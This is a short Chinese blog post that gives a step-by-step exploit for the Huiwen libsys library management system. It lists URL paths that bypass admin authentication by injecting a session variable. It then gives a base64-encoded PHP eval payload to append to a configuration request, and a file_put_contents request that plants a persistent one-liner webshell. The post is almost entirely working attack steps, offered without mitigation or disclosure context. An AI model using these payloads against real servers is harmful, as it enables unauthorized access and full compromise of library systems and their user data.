MENU

汇文libsys前台getshell

April 9, 2016 • Security

首先是绕过管理后台:

'/recm/common.php?_SESSION[ADMIN_USER]=opac_admin',
'/opac/openlink_ebk.php?_SESSION[ADMIN_USER]=opac_admin',
'/opac/ajax_ebook.php?_SESSION[ADMIN_USER]=opac_admin',
'/top/top_custom.php?_SESSION[ADMIN_USER]=opac_admin',
'/calis/artifact.php?_SESSION[ADMIN_USER]=opac_admin',
'/calis/idp.old.php?_SESSION[ADMIN_USER]=opac_admin',
'/calis/idp.php?_SESSION[ADMIN_USER]=opac_admin',
'/manual/common.php?_SESSION[ADMIN_USER]=opac_admin',
'/manual/server/huiwen_backend.php?_SESSION[ADMIN_USER]=opac_admin',
'/opac/hw_center.php?_SESSION[ADMIN_USER]=opac_admin',
'/calis/idp.noencode.php?_SESSION[ADMIN_USER]=opac_admin'

这些web路径任何一个都可以绕过,访问这些web路径后再访问/admin/cfg_basic.php就可以发现已经进入后台了。

剩下的就是getshell了。

进入http://www.xxx.com/admin/cfg_basic.php ,点击下面的确认修改,抓包拦截。

在最后面加上一个这样的string:

&a;@eval(base64_decode("QGV2YWwoJF9HRVRbMV0pOw=="));/

如图:

1111.png

然后就get到了shell:

@eval($_GET[1]);   

不能是$_POST型的shell,

访问:

http://www.xxx.com/admin/cfg_basic.php?1=file_put_contents("123.php", "<?php @eval(\$_POST[1]);?>");

即可在admin目录生成123.php的一句话。

Archives QR Code
QR Code for this page
Tipping QR Code